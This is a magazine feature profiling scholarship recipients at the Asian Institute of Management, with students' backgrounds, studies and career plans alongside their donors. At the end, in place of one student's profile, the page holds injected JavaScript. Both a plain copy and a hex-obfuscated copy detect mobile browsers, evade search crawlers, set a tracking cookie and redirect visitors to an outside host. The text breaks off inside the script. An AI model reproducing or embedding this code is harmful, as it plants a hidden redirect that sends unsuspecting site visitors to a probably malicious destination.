FLYING HIGH: The AIM Scholars

by Rose Cheryl R. Orbigo, BMP 2005 and Krizia Eleni Patrocinio

Triple A Club Scholars

With Jesli Lapus, MBM 1973  as President, the Triple A Club, whose members represent the most outstanding alumni of the Institute, granted its first scholarship to Ariel de la Cruz in 2006. Jonah Avegail Gaerlan and  Katrina Gracia Macaraig are the fortunate recipients of their scholarship for this year.

Jonah Avegail Gaerlan, MBA 2012

 “I hold the conviction that with AIM, perhaps I, too, could become someone remarkable and influential one day.”

When Avy was young, her parents separated, but she still considers her childhood happy. “I believe it made me value the essential things in life at an early age. Thus, I do not believe in misconceptions about ‘broken homes,’ and I would very much like to erase the stigma attached to it.”

Another consequence of the separation is Avy’s admiration of her mother. “[She] single-handedly raised a whole family and made it feel like the toughest of times can come and go like a breeze. She made me into who I am today and taught me the most important things I needed to know about life.”

A graduate of Hospitality and Tourism Management from St. Louis University, Baguio City, Avy worked for the Provincial Government of La Union’s Information and Tourism Office before studying at AIM. “We were in charge of La Union’s tourism operations and marketing, organizing major events, creating press releases and correspondence for the governor, and performing other administrative functions,” she explained.

“I had wanted to pursue higher studies to broaden my knowledge and improve my future prospects,” she said. “After I read testimonies of alumni in the AIM ad in Baguio Midland Courier, my first impression of the school was that it is an enabler of success. It trains people to become competent in facing the world’s challenges and to go beyond what most people are capable of achieving… I chose AIM because of its tradition of excellence that enabled it to produce distinguished top executives through the years. I hold the conviction that with AIM, perhaps I, too, could become someone remarkable and influential one day.”

Avy entered AIM in September 2011 with the help of a scholarship from the Triple A Club. “I would think I got the scholarship because I showed that I was determined to brave AIM’s rigors despite the odds—despite being young and short of experience and funds. Not many people can look at a daunting prospect at hand and have the guts to go the whole mile, take responsibility, and see things through to the end… My family is delighted about my scholarship.”

A few months into the program, Avy found “a lot of the subjects challenging, especially since I have little business and finance background. I have been managing fine though, with perseverance and a good support system. Among the subjects we’ve taken up so far, Macroeconomics is hands-down my favorite… Our professors are the best. They have an uncanny way of thinking and piecing together class discussions such that every session with them is an enriching learning experience.

“Never before have I been in a room full of more brilliant and hardworking people than in an AIM case room,” she continued. “I learn from my classmates not only the substance of the discussion at hand but also the stories behind the perspectives from which they’re coming. I believe the good mix of diversity is one of the best things you can get at AIM.

““I shall thank my sponsor, the Triple A Club, by making good on my scholarship and hopefully living up to their legacy. I would heartily support future scholars,” she promised.

Once she gets her MBA diploma, Avy intends to return to the familiar field of marketing, communications, and PR, but in institutions promoting development, sustainability, and multicultural understanding. Moreover, she can then allot more time to her hobbies. “I engage in physical activities such as basketball, jogging, boxing, and aikido to ease away stress. I constantly find myself going on random walks. On weekends when I have little to do, I pick some place on the map I haven’t been to yet, then I explore and try to find my way around. Contemplating in a little spot of nature is my favorite way to relax, and discovering new things is what keeps my spirit alive.”

Moments of contemplation have led Avy to believe that life may not be fair, but one must “take the worst and use it to make you stronger, and take the best to carry with you every day.” “Things that happen in your life do so for a reason—to make you learn, realize something, and lead you to where you should be,” she stated. “It isn’t because of a pre-arranged and irreconcilable fate; it is so that you yourself can determine your destiny.”

Katrina Gracia Macaraig, MBA 2012

 “ I have always believed that life’s journey is not just about how much I have enriched myself, but it is also how much value addition I have provided to everybody else.”

Kathy holds a Business Management degree from the Ateneo de Manila University. After three years as a trade marketing manager at Unilever Philippines, she considered herself “prepared to take on more challenging roles and responsibilities.” “Specifically, I envisioned myself as a successful general manager and social entrepreneur… I believed that it was necessary for me to further reinforce my strengths and improve on my weaknesses by acquiring a master’s degree at AIM.

“I chose AIM because it has been known for training future Asian managers and leaders using the case method, which involves analytical, logical, and communication skills development,” she said. “Furthermore, the successful career paths and valuable contribution to society of most of AIM’s graduates encouraged me to choose AIM versus other business schools. For me, AIM is simply one of the best Asian business schools.”

Nevertheless, everyone in Kathy’s family was surprised when she divulged her plan to resign from her job. “They knew it was a big risk to let go of a stable career, but all of them knew that the lifetime benefits of getting into AIM are richer. When I broke the news that I passed, they were happy for me, but when I got the scholarship, they were just excited.

“I believe I was able to get the scholarship not only because I showed exemplary performance in my undergraduate school and in Unilever, but also because I have a relentless drive to succeed in all the endeavors I embark on, with cognizance of my responsibilities to society. I have always believed that life’s journey is not just about how much I have enriched myself, but it is also how much value addition I have provided to everybody else―classmates, co-workers, professors, etc.”

Three months into the MBA program, Kathy has adjusted to the everyday rigor. “I have learned to set my priorities and improve my time management skill.” Kathy likes studying Marketing Management, Cost Accounting, Managing Costs and Profits, and Managing People in Organizations.

“I always learn something new from AIM professors,” she noted. “Despite their solid work experience on the subjects, they have remained open and warm in receiving questions, challenges, and criticisms, which makes case discussions much more exciting.”

The diversity in her classmates’ culture, work experience, and insights has enabled Kathy to go beyond her traditional way of thinking and doing. “This learning process happens even in the dormitory lobby and hallway. It’s learning something new every day, everywhere.”

When the pressure and school demands are great, Kathy escapes by engaging in light conversations with friends, listening to music, catching the latest movie, or simply munching French fries.

After graduating, Kathy would like to become a general manager in a multinational corporation and to start her own business. Her role models would be her father, Jovencio, and her mentor, Jesli Lapus (MBM ’73) of the Triple A Club. “Their journeys in life have made me realize that real success is never earned overnight, but it is earned through hard work and patience,” she shared. “They have continuously shown me, in different circumstances, that the real meaning of life is reaching out to others even in the most miniscule manner.” Because of this, Kathy also intends to continue the vision the Triple A Club has for its scholars―that of contributing to AIM and to society. “I plan to partner with them in sending more scholars to AIM.” 

Malvan Hwang Scholar

In July 2010, Malvan Hwang, MBM 1974 came back to visit AIM after 36 years. He was also on a personal mission- to give back to AIM what AIM had given him- a scholarship grant. His donation of US $30,000 specified that his scholarship should be granted to a deserving Filipina. Angela Sanchez is the grateful recipient of his scholarship.      

Angela Sanchez, MBA 2012 

“I do hope though that I will get to meet him [Malvan Hwang] soon and personally thank him. I will again tell this to him: He makes dreams come true.”

Getting an MBA has been a long-time dream for Gel, who comes from a humble family and who studied Commerce at the Ateneo de Davao University. She was a software consultant with Push Technologies International and a junior accountant with Aboitiz Power before getting into AIM.

“I like learning,” said Gel, who considers taking an MBA a personal challenge. “I learned about AIM way back in college from my finance professor. She shared to me what AIM is like… Curiosity led me to wanting to get into the institution. My desire to get an MBA made me search for the best schools. Choosing AIM was no sweat. This is one of the best schools in Asia. I get to stay in my own country and at the same time see diversity in culture.”

Knowing she could not afford the program fees, Gel applied for scholarship and got in. “I am lucky to have a supportive family. My parents have tried their best to inculcate core values in us… The decision to come to AIM was not easy, and their support helped me go on.

“Now I realized I’m getting more than what I wanted,” she confessed. “It became a challenge of what I can make after acquiring this learning, what change I can make in society when I get back… I consider myself an average student. However, I have undying enthusiasm to learn… Reminiscing the classes in Casemanship still excites me. I appreciate Macroeconomics a lot, too; it has been really helpful in understanding current events.”

To Gel, AIM professors are “amazing.” “I find myself in awe in almost every class. They all compel us to think, to search for answers, to be eager to learn more. These professors are masters of their craft.”

Diversity in the students’ culture, work experience, and personalities has made the classes livelier. “Understanding personality and cultural differences has made us more sensitive to each other,” Gel observed. “This will be very helpful, especially when we join the workforce again. We can never choose what kind of persons we have to deal with. Also, learning from the experiences of my classmates has given me more ideas on practices in their fields. Aside from that, I learned to count from one to 20 in Hindi.”

Gel has not yet met her sponsor, Malvan Hwang. “I was able to send him a card,” she noted. “I do hope though that I will get to meet him soon and personally thank him. I will again tell this to him: He makes dreams come true. Should I be given the same chance to change someone’s life for the better, I’d do the same by giving education to less fortunate families.”

With her simple background, Gel finds happiness in simple things. “Sleeping comes first on the list,” she said nonchalantly. “Next will be calling my family, then talking to friends and eating.”

After graduation, Gel wants to hold a position in strategy, risk management, or project management. “AIM has given me many choices,” she said. “I hope AIM continues to develop more leaders who make conscientious decisions for the development of their country.” 

W. SyCip GSB Best and Brightest Scholar

AIM’s W. SyCip GSB Best and Brightest scholarship grant  offers the top undergraduate students with high GMAT/AIMAT scores, and solid work background MBA or MM full tuition scholarship, economy air fare from and to the students’ home country, lodging at the AIM dormitory, and a monthly stipend. Mr. Washington SyCip, one of the founders of the Institute is the generous funder of this program.  

Isagani Lati Jr., MBA 2012 

Gani is the youngest child in a simple family. His mother runs a small store selling fresh meat, fish, and vegetables. His father was a long-time elected barangay (village) official before passing away in 2008 due to diabetes. “Although they wanted to go to college, they were unable to do so because of poverty,” Gani narrated. “Even so, they were able to raise me and my siblings in the best possible way through hard work and perseverance, and without stepping on other people’s shoes.”

As a result, Gani’s brother became a policeman, and his sister now has her own small business. Gani himself completed the BS Accountancy program of San Beda College and landed in the third spot on the CPA board exam. He worked in various capacities for nine years in the Philippines and abroad. His two most recent posts were assistant manager at Manila Doctors Hospital and associate director at the auditing firm SGV & Co. Believing that learning is a continuous process and that his professional life could be improved, Gani decided to study at AIM because of its international recognition and because“its graduates are undeniably considered the movers and shakers of the business world.”

Because of Gani’s credentials, achievements, and personal background, he was conferred the W. SyCip GSB Best and Brightest scholarship. “The professors in AIM saw in me the potential to contribute to the AIM community,” he explained. “My family, especially my mother, was very proud of the recognition. It was an achievement not only for me but also for my family.“

The first three months of the program was really tough, like everything was on fast forward,” he recalled. “You have to absorb every lesson at the shortest possible time. I struggled a little with subjects like Quantitative Analysis and Economics. But it was worthwhile because I learned a lot of new concepts and points of view from my professors and classmates… It’s understandable that I like finance subjects because I have a finance background. But the subject that interests me most is Managing People in Organizations because it deals with leadership skills that every manager should have.

“My classmates are highly competitive,” he described. “They are so competitive that I have to raise my standards to keep up. As the Best and Brightest Scholar, I am expected to perform… The level of competitiveness during class discussions and learning team meetings helps me learn a lot of insights about the cases. It is the interactive experience with people of different cultural and professional backgrounds that has provided me with a lot of insights.”

When his case pack is closed, Gani prefers to watch TV, walk, or hang out with friends. “Any activity that drives me away from doing things that cause stress is a relaxing activity for me.

“I promise to live up to the standards of AIM after graduation because I value the education AIM provides,” continued Gani, who dreams of becoming an entrepreneur and business executive. “I plan to express my gratitude to my sponsor [Washington SyCip] by continuing the tradition of providing scholarships to deserving aspirants who want to pursue their master’s degree in AIM. In return, these aspirants shall contribute to the well-being of society by being responsible leaders in their own organizations and keeping the tradition of providing scholarships in AIM… I want my alma mater to be a platform for future leaders here and abroad by maintaining its commitment to excellence.”

 Gabby and Marianne Paredes Scholar

During  the signing ceremony of Chibuom Corporation for a full scholarship grant, Gabby Paredes, MBM 1972 shared that “This is my giving back to AIM. We believe in the value of education and what it can do for a deserving student: how it can change your life and how you contibute to society eventually.” Kristeen Joi Lantican is the lucky recipient of the Gabby and Marianne Paredes Scholarship.      

Kristeen Joi Lantican, MBA 2012 

“Someday I hope that I can pay it forward.”

Kristeen was the breadwinner in her family prior to taking up her MBA. An Economics graduate of the University of the Philippines Los Baños, she used to be a project development officer for Avida Land Corp. Encouraged by her aunt, who is a college dean and her role model, and inspired by her philosophy “make a choice and don’t look back,” Kristeen applied to AIM to realize her plan of pursuing graduate studies by age 25. “My sponsor told me he was glad that I didn’t let go of my dream even if I knew I couldn’t afford it. He told me to keep on dreaming.”

AIM is tough, but Kristeen is “doing fine.” She appreciates most the subjects Macroeconomics and Managing Costs and Profits. During down time, she dines with friends and classmates.

“It’s like everybody here is really smart,” she observed. “I feel that I have to strive harder to keep up. But I enjoy hearing all the opinions in class, especially during case discussions.” Studying hard is the only way she can thank her sponsor at the moment. “However, someday I hope that I can pay it forward.”

After graduation, Kristeen plans to return to the real estate industry. “But I plan to be an entrepreneur as well,” she added.

The Chen-Yung Memorial Foundation Scholarship

Dr. Ching Chih Chen, an esteemed member of the AIM Board of Governors from 2007 to 2009, and Chairman of the Chen-Yung Memorial Foundation, donated US$180,000.00 over three years to AIM in support of potential students who will participate in furthering the human resource development of Vietnam in the field of management. Dr. Chen was educated at Massachusetts Institute of Technology, USA and also heads Wan Hai Shipping Lines, headquartered in Taiwan and with 125 offices all over the world.

The annual donation of US$60,000.00 provided students with full scholarships, support their living expenses, and fund the airfare to and from Vietnam. Through the Chen-Yung Memorial Foundation, which was named in memory of Dr. Chen’s father, the Chen-Yung Memorial Foundation Scholarship provided deserving students from Vietnam the opportunity to receive a Master in Business Administration (MBA), Master in Management (MM), and/or Master in Development Management (MDM) degree in AIM.

Since 2009, there have been ten (10) recipients of the Chen-Yung Memorial Foundation Scholarship: Nguyen Thi Phuong Uyen (MBA 2010), Dao Le Tram Anh (MBA 2010), Tran Cong Bang (MDM 2010), Tran Bich Thuy (MDM 2010), Nguyen Tieu My (MBA 2011), Le Nguyen Nhat Chinh (MBA 2011), Nguyen Thi Thu Trang (MDM 2011), Tran Thi Minh Hue (MBA 2012), Ngo Thi Thanh Van (MDM 2012) and Phan Thanh Ngoc (MDM 2012).

Trang Thi Thu Nguyen, MDM 2011

As a young girl growing up in one of the rural coastal areas of Vietnam, Trang Thi Thu Nguyen saw the importance of having a certain level of authority. She realized there was a need for power and influence to be able to address the problems of the disadvantaged sectors of society and to make changes in their lives. This inspired her to strive to be someone with power and influence, so she can make changes from the grassroots level upwards. She admired and respected people who have big dreams, who are unafraid to challenge the tough world, and passionately pursued their dreams until they reached them.

Trang recognized that for her to enable change, wield influence and obtain power, she needed to study and work hard. “My ultimate goal was to work for the betterment of humanity in my own small ways,” she revealed. She went on to finish her Bachelor of Science degree with a major in Information Technology at the University of Natural Science in Vietnam. After graduation she worked as an Application Developer and IT technical trainer for Scancom Ltd Co. After two years, she moved to InvestConsultGroup as Deputy Manager of Center of Information & Market Research.

She was enjoying her job responsibilities but her interest in social service never wavered. She then decided to join Vietnam Chamber of Commerce and Industry (VCCI), a public non-profit organization, and worked as a Development Planning Manager. She was responsible for organizing business-matching and cooperation programs to promote trade co-operation between Vietnamese enterprises and overseas enterprises. “I am conscientious in studying and looking for solutions in the issues that Vietnamese enterprises have been facing unsatisfactorily, particularly in human resource development and business management. I am interested in projects relating to enterprises because their positive changes can considerably impact social and economic issues, especially poverty. I am motivated to help poor people in coastal areas, the place I lived for a long time,” she shared.

When the opportunity to study in AIM presented itself, Trang unhesitatingly grabbed it. “My unique blend of experiences in professional development, strong commitment, and clear ultimate goal for my future career path and potential contribution gave me confidence to pursue my application to the Masters in Development Management (MDM) program. I wanted to enhance my academic qualification, build networks, and strengthen my career path. Knowing that AIM is one of the best in Asia, I wanted to study here as it is the lifetime opportunity for me. I learned of AIM’s reputation through my friends who are AIM alumni,” she admitted.

After a series of interviews, she was accepted into the MDM program and received full scholarship from the Chen Yung Memorial Foundation, courtesy of Dr. Ching-Chih Chen, Chairman of Wan Hai Lines and former Member of the AIM Board of Trustees.  “When I arrived at AIM, I thought the experience was going to be like in any other university, where you have a lot of free time to study or do other things on your own, but it was completely different. AIM is fully an academic-oriented school where students are required to do all the academic work, either in CAN groups and individually. I realized that the key to success here is to work smartly and diligently. If you cannot manage workflow and stress in a small laboratory environment like AIM, you cannot succeed in the tough world,” she disclosed.

“Studying in AIM is very challenging. It tests your aptitude and ability and pushes you to make full use of your potential. Most of my subjects are very useful. I like Base of Pyramid, Business Economics, Macro-Micro Economics, PPDM, Regional Integration Asia, System Thinking, and Strategic Management best. These courses provided me with effective tools, as well as shaped my mindset in the way I analyze a problem. I learned how to use techniques such as looking at problems as a whole or as inter-dependent links, or thinking out of box, or seeing the opportunities in threats, etc.,” she proudly stated.

“My class consists of students from different countries coming from varying professional backgrounds. They are friendly and unique in their own ways. I learned a lot from being with them, listening to their experiences, working with them and drawing insights from their learning. Likewise, I learned so much from all of my professors. They are all qualified and well experienced and they know their subjects well. Most importantly they understand the students.”

Trang further divulged that studying in AIM made her a better individual. “The rigor and pressure I went through while studying made me a better and stronger person, and I feel I am ready to face any challenges [that I would face] in my life. I believe I am in a better position to take up any kind of career.”

“The biggest benefits I gained from AIM are the following: gaining better insight on development environment issues, acquiring a deeper knowledge of what I can do to bring benefits of my service to enterprises and to society, and last but not least, learning the essential skills in development and business management, especially in areas where I am concerned about. Core subjects are extremely attached to my future career in planning training courses or international cooperation projects. AIM gave me the tools to create firm connections between organizations and enterprises, as well as lessons on how to open a network to create public value at the same time maximize the sustainable public good.”

She revealed that during her free time, she joins community and volunteer activities. “I do this to keep my heart warm and contribute to social good. Every year, I travel as a backpacker to remote areas to talk with people, to see beautiful landscapes, to learn diverse cultures, to see how small the world is and to gain personal maturity and appreciation for our world. In AIM, I do some exercises like jogging, playing badminton and swimming. I also listen to music to relax my mind, keep myself refreshed, and energized. I also like to read books to give food to my mind.”

When asked about her future plans, Trang shared that she would like to continue working in VCCI or in any like-minded NGOs. “My concern in strengthening the role of enterprises in solving social and economic problems will remain as my main motivation. I will develop programs for training and international cooperation. These programs will help in developing my country’s human resource, increase empowerment, and nurture social responsibility of enterprises. The expected result is for enterprises to create small changes in their system. These changes will work as pressure points to eventually trigger and cascade larger social transformation. In a long-term perspective, this will contribute to sustainable growth and development of Vietnam. The public value will be created and public good will be maximized through strong networks of our organization and enterprises.”

A far cry from the young girl who only dreamed of change, Trang emerged from AIM with a deep-seated purpose and clear outline of how to reach her goals. “By the time that I gain enough experience as well as sufficient capital, I would like to start my own business as a social entrepreneur. I see myself working passionately, being an inspiration and giving determination to effect positive changes in the social issues that my country faces. I expect to play an intermediary role to help Vietnam to overcome the obstacles it confronts and then attempt to implement solutions and projects successfully. My potential contribution to my country is promising,” she stated.

“The only way I can thank Dr. Ching Chih Chen is to be the best in whatever work I take up in the future,” she disclosed. She goes on to share this piece of leadership insight: “In the age of globalization, a leader will be a designer who will come up with new things, who possesses critical thinking, creativity, team work and self-learning.”

Trang has this to say for others who aspire to bring change and achieve their goals: “Be who you are and pursue your aspirations. Be a good person and do not trample upon the rights of others to reach your way to the top.”

Hue Thi Minh Tran, MBA 2012

“Stay hungry. Stay foolish.” This line, made famous by the late Steve Jobs, co-founder of Apple Inc., perfectly describes this scholar’s attitude towards the rigors of studying Masters in Business Administration in AIM. Hue Thi Minh Tran walks the halls with an air of springy enthusiasm and effervescent geniality. Despite the number of cases she had to read every day, not to mention lack of sleep, she relishes each discovery she makes and new information she grasps in and out of the caseroom. Her passion towards learning stems from her personal commitment to improve the society and engage in activities that ensures sustainable development in the community.

She brightens when she talks about her experience while in AIM. “The harder I tried to understand the concepts, the more excited I became. I often start with the question: Why do I have to study this subject? What are the key messages/key points I have to remember in this exercise?” she shared. She told us that her previous professional experiences in Vietnam also helped her appreciate the course work. “I often reflect on the things I was doing in Vietnam whenever I study to make sense of the concepts I was trying to understand. Then I would try to think of best ways to apply whatever lessons I learnt to reality: in my daily life, as well as my work. Mastering new knowledge, especially those on management and organization development, is crucial to elevating my working performance to a new level.”

Prior to studying in AIM, she was with the Center for Community Empowerment (CECEM), a leading capacity building organization in Vietnam. The company offers services on project management, community development, training and communication methodologies, organizational development, etc. She also contributed to develop HanoiGrapevine.com, a bilingual website updating the public about arts and cultural events in Vietnam. She finished Bachelor of Arts with a degree in International Business & Economics at the Foreign Trade University in Vietnam.

“I decided to apply for a scholarship in AIM because the school is famous for teaching management frameworks, with very active and participatory methodologies (case-based method as in Havard business school) and excellent professors with experience in consulting for government and businesses”, she revealed. “My colleague, who studied MDM before, shared about student life in AIM, which inspired me even more to apply. After being interviewed by Prof. Junbo Borromeo, I became more inspired and firmly believed that AIM is a good learning environment for me.”

She was consequently accepted into the Masters in Business Administration program and received a full scholarship from the Chen Yung Memorial Foundation, courtesy of Dr. Ching-Chih Chen, Chairman of Wan Hai Lines and former Member of the AIM Board of Trustees. When she set foot in the Philippines for the first time, she admitted that Makati captivated her. “Makati is like New York in my eyes and AIM is like Havard (though I haven’t been there) but very Asia. Filipinos were nice people with warm smiles, and AIM had good facilities and very professional environment. I was a bit amazed to see many Indian students here. I love this place! I affirmed again that my decision to come here to study is right!” she exclaimed.

She remembers how she was intimidated during the first weeks of classes. ”At first I was scared of taking Quantitative Analysis (QA) and Language of Business (LOB). They are all about numbers which I am not good at”, she reasoned. “When I realized that QA is applied a lot in marketing, and the task of understanding financial statements in LOB is integral for managing a company, I liked them better. I became more confident in sharing what I learned during class discussions, and more versed with interpreting the concept in the book in a way that is more understandable. I also learned to check with the professors and classmates.”

Hue credits her professors, as well as her classmates, for her enthusiasm towards her studies. “I appreciate that my professors are great, experienced and professional. They are excellent facilitators who helped me improve my thinking process. I am now able to dig deeper and get better at getting insights when I am doing my case analysis. All of them had different teaching methods that enabled me to have a better understanding of my subjects.” As a trainer and facilitator herself, she also learned techniques from the processes and methodologies that her professors use.  “I believe it is more effective when professors share insights from their consultancy experience, rather than relying on books or theories when they expound certain topics.” She says her classmates also help her cope with the pressures better. “We call our Cohort the Outliner. My classmates are very cool! They are warm and funny. Most of them are smart and experienced, but modest and open to share in class. Many are helpful and organize tutor classes.”

She is thankful for her the opportunity to have a Masters degree. She says it will enable her to realize her dream of becoming a famous expert and sought-after consultant in the development field. She is hopeful for a chance to meet Dr. Ching Chih Chen and share with him the things she learned and her plans for the future. She shares that when she goes back to her country, she will do what she can to contribute to the development of Vietnam. “I actually want to document and write several cases from Vietnam that can be used in AIM for discussions. I’m still grappling with ideas, but I hope I have a chance and support to do it.”

Meanwhile, she looks forward to finishing her degree and getting married after graduation. Her support system from her family, as well as constant encouragement from her boyfriend, keeps her from being homesick. “I do not worry about my family because my parents are very optimistic and they care about each other. My boyfriend inspires me to do well in my studies. Overall I am thankful for this opportunity and happy to be in AIM. I am very hopeful and very excited about the future ahead of me,” she finished.

Nguyen Tieu My, MBA 2011

“I am the first in my family to get the chance to have a degree in Masters in Business Administration,” shared Nguyen Tieu My. May, as she likes to be called, was granted a full scholarship by the Chen Yung Memorial Foundation, courtesy of Dr. Ching Chih Chen, Chairman of Wan Hai Lines and former Member of AIM Board of Trustees. Prior to studying at AIM, she worked as a Senior Marketing Executive at Berjaya Group of Companies. She finished her Bachelor of Arts degree with a major in English Linguistics and Literatures at the University of Social Sciences and Humanities.

As a child, she wanted to become a philanthropist in the United States of America. Growing up, she idolized current US Secretary of State Hillary Rodham Clinton, who was a strong proponent of promoting women empowerment in the United States and elsewhere. Having the opportunity to become exposed to global affairs motivated May to apply to AIM. “I want to improve my management skills and expose myself to business practices of the international community. My former boss is an MM alumnus, who told my career opportunities will be significantly expanded after studying in AIM,” she disclosed.

During her first weeks at AIM, she already felt the rigor of competition among the students. This motivated her to push further and study harder.  She counts Marketing Management, Business Economics and Management Communication as her favorite subjects. She shared that she learned much during her stint at AIM. “My classmates are very fast, aggressive, and competitive. I was impressed with their English communication skills, and this motivated me to speak more actively during class. I also learned to use logic and structured thinking, and the value of time management.” She further revealed that she coped with the rigors of the course through her willingness to learn and capability to work under pressure.

“My professors were all knowledgeable, disciplined and thoughtful. I am very grateful for the exposure that I get and the knowledge that I learn to be able to achieve my goals of working in education consultancy or a media agency. Thanks to my professors, I learned many management concepts I can apply to my future career, improve my communication skills, and adapt to pressure well,” she proudly stated.

This early, May strongly recommends for Vietnamese students to study at AIM. “I believe that the lessons taught at AIM will develop and sustain Asia. I recommend for more potential candidates to study in AIM as it is good for Vietnam’s development. I am willing to be active in the alumni network and help promote AIM to Vietnam,” she guaranteed.

May believes that showing potential candidates how AIM improves lives of its students, and encouraging them t study in AIM, can show her sponsor how truly grateful she is for the opportunity to study at AIM. “If not for Dr. Ching-Chih Chen’s generosity, I would not be able to have a better and brighter future,” she revealed.

Le Nguyen Nhat Chinh, MBA 2011

 if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v 